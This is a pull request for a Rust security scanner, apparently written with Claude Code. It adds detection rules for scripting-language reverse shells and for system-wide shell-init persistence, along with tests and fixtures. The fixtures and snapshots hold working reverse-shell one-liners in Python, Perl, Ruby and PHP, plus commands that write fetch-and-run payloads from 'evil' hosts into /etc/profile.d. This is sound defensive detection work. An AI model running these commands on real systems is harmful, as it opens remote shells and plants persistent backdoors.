### PR TITLE
feat(rules): add EX-019 scripting reverse shell + PS-012 system shell init

### DIFF
--- a/src/rules/builtin/exfiltration.rs
+++ b/src/rules/builtin/exfiltration.rs
@@ -20,6 +20,7 @@ pub fn rules() -> Vec<Rule> {
         ex_016(),
         ex_017(),
         ex_018(),
+        ex_019(),
     ]
 }
 
@@ -595,6 +596,44 @@ fn ex_018() -> Rule {
         cwe_ids: &["CWE-918", "CWE-200"],
     }
 }
+
+fn ex_019() -> Rule {
+    Rule {
+        id: "EX-019",
+        name: "Scripting-language reverse shell",
+        description: "Detects reverse shells built from a scripting language's socket and exec primitives (Python/Perl/Ruby/PHP), complementing the netcat/socat//dev/tcp rules (MITRE T1059, T1071)",
+        severity: Severity::Critical,
+        category: Category::Exfiltration,
+        confidence: Confidence::Firm,
+        patterns: vec![
+            // Python fd redirection into a subprocess (classic reverse shell)
+            Regex::new(r"os\.dup2\([^\n]*\bsubprocess").expect("EX-019: invalid regex"),
+            // Python reverse-shell import combo
+            Regex::new(r"import\s+socket\s*,\s*subprocess|import\s+subprocess\s*,\s*socket|socket\s*,\s*subprocess\s*,\s*os")
+                .expect("EX-019: invalid regex"),
+            // Python pty spawning an interactive shell
+            Regex::new(r#"pty\.spawn\(\s*['"]?/?(bin/)?(ba)?sh"#).expect("EX-019: invalid regex"),
+            // Perl reverse shell (Socket + exec)
+            Regex::new(r"perl\s+-e[^\n]*(Socket|socket)[^\n]*exec").expect("EX-019: invalid regex"),
+            // Ruby reverse shell
+            Regex::new(r"ruby\s+-rsocket[^\n]*(exec|/bin/sh)").expect("EX-019: invalid regex"),
+            // PHP reverse shell via fsockopen
+            Regex::new(r"php\s+-r[^\n]*fsockopen").expect("EX-019: invalid regex"),
+            Regex::new(r"fsockopen\([^\n]*(exec|/bin/sh|proc_open|shell_exec)")
+                .expect("EX-019: invalid regex"),
+        ],
+        exclusions: vec![
+            // Comment lines
+            Regex::new(r"^\s*#").expect("EX-019: invalid regex"),
+        ],
+        message: "Scripting-language reverse shell detected: socket + shell-exec primitives are being combined to open an interactive shell to a remote host.",
+        recommendation: "Remove the reverse-shell construct and audit the surrounding script. Artifacts must not open interactive shells to the network.",
+        fix_hint: Some(
+            "Delete the socket+exec reverse-shell one-liner; legitimate networking should use documented, reviewable tools.",
+        ),
+        cwe_ids: &["CWE-506", "CWE-912"],
+    }
+}
 #[cfg(test)]
 mod tests {
     use super::*;
@@ -868,5 +907,50 @@ mod tests {
         let content = include_str!("../../../tests/fixtures/rules/ex_018.txt");
         let findings = crate::rules::snapshot_test::scan_with_rule(&rule, content);
         crate::assert_rule_snapshot!("ex_018", findings);
+    }
+
+    #[test]
+    fn test_ex_019() {
+        let rule = ex_019();
+        let test_cases = vec![
+            // Malicious: scripting-language reverse shells
+            (
+                r#"python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("10.0.0.1",4444));os.dup2(s.fileno(),0);subprocess.call(["/bin/sh","-i"])'"#,
+                true,
+            ),
+            (r#"python3 -c 'import pty; pty.spawn("/bin/bash")'"#, true),
+            (
+                r#"perl -e 'use Socket;connect(S,...);exec("/bin/sh -i");'"#,
+                true,
+            ),
+            (
+                r#"ruby -rsocket -e 'c=TCPSocket.new("10.0.0.1","4444");exec"/bin/sh -i"'"#,
+                true,
+            ),
+            (
+                r#"php -r '$s=fsockopen("10.0.0.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");'"#,
+                true,
+            ),
+            // Benign: standalone socket/subprocess/scripting usage
+            ("import socket", false),
+            (r#"subprocess.run(["ls", "-l"])"#, false),
+            (r#"perl -e 'print "hello\n"'"#, false),
+            ("php -r 'echo phpversion();'", false),
+        ];
+
+        for (input, should_match) in test_cases {
+            let matched = rule.patterns.iter().any(|p| p.is_match(input));
+            let excluded = rule.exclusions.iter().any(|e| e.is_match(input));
+            let result = matched && !excluded;
+            assert_eq!(result, should_match, "EX-019: Failed for input: {}", input);
+        }
+    }
+
+    #[test]
+    fn snapshot_ex_019() {
+        let rule = ex_019();
+        let content = include_str!("../../../tests/fixtures/rules/ex_019.txt");
+        let findings = crate::rules::snapshot_test::scan_with_rule(&rule, content);
+        crate::assert_rule_snapshot!("ex_019", findings);
     }
 }

--- a/src/rules/builtin/persistence.rs
+++ b/src/rules/builtin/persistence.rs
@@ -13,6 +13,7 @@ pub fn rules() -> Vec<Rule> {
         ps_009(),
         ps_010(),
         ps_011(),
+        ps_012(),
     ]
 }
 
@@ -362,6 +363,40 @@ fn ps_011() -> Rule {
         cwe_ids: &["CWE-506", "CWE-912"],
     }
 }
+
+fn ps_012() -> Rule {
+    Rule {
+        id: "PS-012",
+        name: "System-wide shell init persistence",
+        description: "Detects writes into /etc/profile.d/ or /etc/profile, which run for every login shell of every user — a system-wide persistence vector distinct from per-user dotfiles (MITRE T1546.004)",
+        severity: Severity::Critical,
+        category: Category::Persistence,
+        confidence: Confidence::Firm,
+        patterns: vec![
+            // Redirect/copy/move/tee/install a payload into a profile.d drop-in
+            Regex::new(r"(>>?|tee|cp|mv|install)\s+[^\n]*/etc/profile\.d/\S+")
+                .expect("PS-012: invalid regex"),
+            // Download directly into a profile.d drop-in
+            Regex::new(r"(curl|wget)\s+[^\n]*/etc/profile\.d/\S+").expect("PS-012: invalid regex"),
+            // Write into the system-wide /etc/profile
+            Regex::new(r"(>>?|tee|cp|mv|install)\s+[^\n]*/etc/profile\b")
+                .expect("PS-012: invalid regex"),
+        ],
+        exclusions: vec![
+            // Comment lines
+            Regex::new(r"^\s*#").expect("PS-012: invalid regex"),
+            // Read-only inspection / sourcing of existing profile scripts
+            Regex::new(r"^\s*(cat|less|stat|grep|ls|source|\.)\s+[^\n]*/etc/profile")
+                .expect("PS-012: invalid regex"),
+        ],
+        message: "System-wide shell init persistence detected: a payload is being written to /etc/profile.d/ or /etc/profile, which runs for every user's login shell.",
+        recommendation: "Artifacts must not write system-wide shell init files. Remove the write and audit /etc/profile.d for planted scripts.",
+        fix_hint: Some(
+            "Delete writes to /etc/profile.d/ and /etc/profile; system-wide shell configuration belongs in reviewed provisioning.",
+        ),
+        cwe_ids: &["CWE-506", "CWE-912"],
+    }
+}
 #[cfg(test)]
 mod tests {
     use super::*;
@@ -558,5 +593,41 @@ mod tests {
         let content = include_str!("../../../tests/fixtures/rules/ps_011.txt");
         let findings = crate::rules::snapshot_test::scan_with_rule(&rule, content);
         crate::assert_rule_snapshot!("ps_011", findings);
+    }
+
+    #[test]
+    fn test_ps_012_detects_system_shell_init() {
+        let rule = ps_012();
+        let test_cases = vec![
+            // Malicious: writes into /etc/profile.d or /etc/profile
+            (
+                "echo 'curl http://evil|sh' > /etc/profile.d/backdoor.sh",
+                true,
+            ),
+            ("cp payload.sh /etc/profile.d/00-init.sh", true),
+            ("echo 'export EVIL=1' >> /etc/profile", true),
+            ("tee /etc/profile.d/hook.sh < payload", true),
+            ("curl http://evil.example/x.sh -o /etc/profile.d/x.sh", true),
+            // Benign: reads, sourcing, listing
+            ("cat /etc/profile.d/nvm.sh", false),
+            ("source /etc/profile.d/bash_completion.sh", false),
+            ("ls /etc/profile.d/", false),
+            ("echo \"$PROFILE\"", false),
+        ];
+
+        for (input, should_match) in test_cases {
+            let matched = rule.patterns.iter().any(|p| p.is_match(input));
+            let excluded = rule.exclusions.iter().any(|e| e.is_match(input));
+            let result = matched && !excluded;
+            assert_eq!(result, should_match, "PS-012: Failed for input: {}", input);
+        }
+    }
+
+    #[test]
+    fn snapshot_ps_012() {
+        let rule = ps_012();
+        let content = include_str!("../../../tests/fixtures/rules/ps_012.txt");
+        let findings = crate::rules::snapshot_test::scan_with_rule(&rule, content);
+        crate::assert_rule_snapshot!("ps_012", findings);
     }
 }

--- a/tests/fixtures/rules/ex_019.snap
+++ b/tests/fixtures/rules/ex_019.snap
@@ -1,0 +1,61 @@
+---
+source: src/rules/builtin/exfiltration.rs
+expression: findings
+---
+[
+  {
+    "id": "EX-019",
+    "severity": "critical",
+    "category": "exfiltration",
+    "confidence": "firm",
+    "name": "Scripting-language reverse shell",
+    "line": 8,
+    "code": "python -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"10.0.0.1\",4444));os.dup2(s.fileno(),0);subprocess.call([\"/bin/sh\",\"-i\"])'",
+    "message": "Scripting-language reverse shell detected: socket + shell-exec primitives are being combined to open an interactive shell to a remote host.",
+    "recommendation": "Remove the reverse-shell construct and audit the surrounding script. Artifacts must not open interactive shells to the network."
+  },
+  {
+    "id": "EX-019",
+    "severity": "critical",
+    "category": "exfiltration",
+    "confidence": "firm",
+    "name": "Scripting-language reverse shell",
+    "line": 9,
+    "code": "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'",
+    "message": "Scripting-language reverse shell detected: socket + shell-exec primitives are being combined to open an interactive shell to a remote host.",
+    "recommendation": "Remove the reverse-shell construct and audit the surrounding script. Artifacts must not open interactive shells to the network."
+  },
+  {
+    "id": "EX-019",
+    "severity": "critical",
+    "category": "exfiltration",
+    "confidence": "firm",
+    "name": "Scripting-language reverse shell",
+    "line": 10,
+    "code": "perl -e 'use Socket;connect(S,...);exec(\"/bin/sh -i\");'",
+    "message": "Scripting-language reverse shell detected: socket + shell-exec primitives are being combined to open an interactive shell to a remote host.",
+    "recommendation": "Remove the reverse-shell construct and audit the surrounding script. Artifacts must not open interactive shells to the network."
+  },
+  {
+    "id": "EX-019",
+    "severity": "critical",
+    "category": "exfiltration",
+    "confidence": "firm",
+    "name": "Scripting-language reverse shell",
+    "line": 11,
+    "code": "ruby -rsocket -e 'c=TCPSocket.new(\"10.0.0.1\",\"4444\");exec\"/bin/sh -i\"'",
+    "message": "Scripting-language reverse shell detected: socket + shell-exec primitives are being combined to open an interactive shell to a remote host.",
+    "recommendation": "Remove the reverse-shell construct and audit the surrounding script. Artifacts must not open interactive shells to the network."
+  },
+  {
+    "id": "EX-019",
+    "severity": "critical",
+    "category": "exfiltration",
+    "confidence": "firm",
+    "name": "Scripting-language reverse shell",
+    "line": 12,
+    "code": "php -r '$s=fsockopen(\"10.0.0.1\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'",
+    "message": "Scripting-language reverse shell detected: socket + shell-exec primitives are being combined to open an interactive shell to a remote host.",
+    "recommendation": "Remove the reverse-shell construct and audit the surrounding script. Artifacts must not open interactive shells to the network."
+  }
+]

--- a/tests/fixtures/rules/ex_019.txt
+++ b/tests/fixtures/rules/ex_019.txt
@@ -1,0 +1,18 @@
+# EX-019: Scripting-language reverse shell
+# Test cases for snapshot testing
+# Detects reverse shells built with a scripting language's socket + exec
+# primitives (Python/Perl/Ruby/PHP), not covered by EX-005/EX-006/EX-015
+# (MITRE T1059, T1071).
+
+# === Cases that SHOULD be detected ===
+python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("10.0.0.1",4444));os.dup2(s.fileno(),0);subprocess.call(["/bin/sh","-i"])'
+python3 -c 'import pty; pty.spawn("/bin/bash")'
+perl -e 'use Socket;connect(S,...);exec("/bin/sh -i");'
+ruby -rsocket -e 'c=TCPSocket.new("10.0.0.1","4444");exec"/bin/sh -i"'
+php -r '$s=fsockopen("10.0.0.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
+
+# === Cases that should NOT be detected (benign) ===
+import socket
+subprocess.run(["ls", "-l"])
+perl -e 'print "hello\n"'
+php -r 'echo phpversion();'

--- a/tests/fixtures/rules/ps_012.snap
+++ b/tests/fixtures/rules/ps_012.snap
@@ -1,0 +1,61 @@
+---
+source: src/rules/builtin/persistence.rs
+expression: findings
+---
+[
+  {
+    "id": "PS-012",
+    "severity": "critical",
+    "category": "persistence",
+    "confidence": "firm",
+    "name": "System-wide shell init persistence",
+    "line": 8,
+    "code": "echo 'curl http://evil|sh' > /etc/profile.d/backdoor.sh",
+    "message": "System-wide shell init persistence detected: a payload is being written to /etc/profile.d/ or /etc/profile, which runs for every user's login shell.",
+    "recommendation": "Artifacts must not write system-wide shell init files. Remove the write and audit /etc/profile.d for planted scripts."
+  },
+  {
+    "id": "PS-012",
+    "severity": "critical",
+    "category": "persistence",
+    "confidence": "firm",
+    "name": "System-wide shell init persistence",
+    "line": 9,
+    "code": "cp payload.sh /etc/profile.d/00-init.sh",
+    "message": "System-wide shell init persistence detected: a payload is being written to /etc/profile.d/ or /etc/profile, which runs for every user's login shell.",
+    "recommendation": "Artifacts must not write system-wide shell init files. Remove the write and audit /etc/profile.d for planted scripts."
+  },
+  {
+    "id": "PS-012",
+    "severity": "critical",
+    "category": "persistence",
+    "confidence": "firm",
+    "name": "System-wide shell init persistence",
+    "line": 10,
+    "code": "echo 'export EVIL=1' >> /etc/profile",
+    "message": "System-wide shell init persistence detected: a payload is being written to /etc/profile.d/ or /etc/profile, which runs for every user's login shell.",
+    "recommendation": "Artifacts must not write system-wide shell init files. Remove the write and audit /etc/profile.d for planted scripts."
+  },
+  {
+    "id": "PS-012",
+    "severity": "critical",
+    "category": "persistence",
+    "confidence": "firm",
+    "name": "System-wide shell init persistence",
+    "line": 11,
+    "code": "tee /etc/profile.d/hook.sh < payload",
+    "message": "System-wide shell init persistence detected: a payload is being written to /etc/profile.d/ or /etc/profile, which runs for every user's login shell.",
+    "recommendation": "Artifacts must not write system-wide shell init files. Remove the write and audit /etc/profile.d for planted scripts."
+  },
+  {
+    "id": "PS-012",
+    "severity": "critical",
+    "category": "persistence",
+    "confidence": "firm",
+    "name": "System-wide shell init persistence",
+    "line": 12,
+    "code": "curl http://evil.example/x.sh -o /etc/profile.d/x.sh",
+    "message": "System-wide shell init persistence detected: a payload is being written to /etc/profile.d/ or /etc/profile, which runs for every user's login shell.",
+    "recommendation": "Artifacts must not write system-wide shell init files. Remove the write and audit /etc/profile.d for planted scripts."
+  }
+]

--- a/tests/fixtures/rules/ps_012.txt
+++ b/tests/fixtures/rules/ps_012.txt
@@ -1,0 +1,18 @@
+# PS-012: System-wide shell init persistence
+# Test cases for snapshot testing
+# Detects writes into /etc/profile.d/ or /etc/profile, which run for every
+# login shell of every user — a distinct persistence vector from per-user
+# dotfiles (PS-003). MITRE T1546.004.
+
+# === Cases that SHOULD be detected ===
+echo 'curl http://evil|sh' > /etc/profile.d/backdoor.sh
+cp payload.sh /etc/profile.d/00-init.sh
+echo 'export EVIL=1' >> /etc/profile
+tee /etc/profile.d/hook.sh < payload
+curl http://evil.example/x.sh -o /etc/profile.d/x.sh
+
+# === Cases that should NOT be detected (benign) ===
+cat /etc/profile.d/nvm.sh
+source /etc/profile.d/bash_completion.sh
+ls /etc/profile.d/
+echo "$PROFILE"


### PR DESCRIPTION
## Summary

Continues the detection-rule expansion loop. Two new rules, each with malicious + benign fixtures and a passing false-positive gate.

| Rule | Technique | Severity | MITRE |
|------|-----------|----------|-------|
| **EX-019** Scripting-language reverse shell | Python/Perl/Ruby/PHP socket+exec reverse shells (socket/subprocess, pty.spawn, Socket+exec, fsockopen) | Critical | T1059, T1071 |
| **PS-012** System-wide shell init persistence | writes into `/etc/profile.d/` or `/etc/profile` (runs for every user's login shell) | Critical | T1546.004 |

Rule count **110 → 112**.

## Duplicate checks

- Reverse shell: EX-005 (netcat), EX-006 (socat `TCP:`), EX-015 (`/dev/tcp`) were covered; the scripting-language socket+exec one-liners were not.
- Shell init: PS-003 only flags per-user dotfiles (`.bashrc`/`.zshrc`/…); system-wide `/etc/profile.d/` and `/etc/profile` were uncovered.
- Also considered and dropped a TLS-bypass rule (SC-006 already flags `curl -k`/`--insecure`/`--no-check-certificate`) and a systemd `.timer` rule (PS-008 already covers it).

## Testing

- `cargo test` — 1727 lib tests green, new unit + snapshot tests pass
- `cargo clippy -- -D warnings` — clean
- `cargo fmt` — clean
- FP gate: each rule's benign fixture section produces zero findings

🤖 Generated with [Claude Code](https://claude.com/claude-code)